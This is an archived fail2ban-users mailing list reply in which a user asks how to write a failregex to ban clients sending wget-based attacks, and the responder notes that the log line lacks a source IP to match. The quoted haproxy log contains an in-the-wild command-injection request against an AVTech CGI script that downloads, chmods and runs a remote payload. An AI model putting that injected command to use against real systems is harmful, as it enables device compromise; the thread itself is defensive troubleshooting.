[prev in list] [next in list] [prev in thread] [next in thread]
List: fail2ban-users
Subject: Re: [Fail2ban-users] Ban IPs that try to "wget" in the request
From: James Moe via Fail2ban-users <fail2ban-users () lists ! sourceforge ! net>
Date: 2018-11-24 21:08:11
Message-ID: 5771c86c-d841-a140-8c48-da5aaa90e841 () sohnen-moe ! com
[Download RAW message or body]
On 24/11/2018 6.58 AM, Kevin S/Lucas Y wrote:
> I try to ban IPs that try to wget something into my server.
> how am i going to do the failregex?
> For example:
> Nov 20 18:04:28 ubuntu haproxy[12789]: ***********:39636
> [20/Nov/2018:18:04:28.627] http_front http_back/main 286/0/4/25/315 400
> 392 - - ---- 0/0/0/0/0 0/0 "GET
> /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com
> <http://google.com>&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.U \
> ser1.Password%3E$(cd%20/tmp;%20wget%20http://***********/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin
> HTTP/1.1"
>
Without a source IP address for the <HOST>, there is no regex to match
the given text.
--
James Moe
moe dot james at sohnen-moe dot com
520.743.3936
Think.
_______________________________________________
Fail2ban-users mailing list
Fail2ban-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/fail2ban-users
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic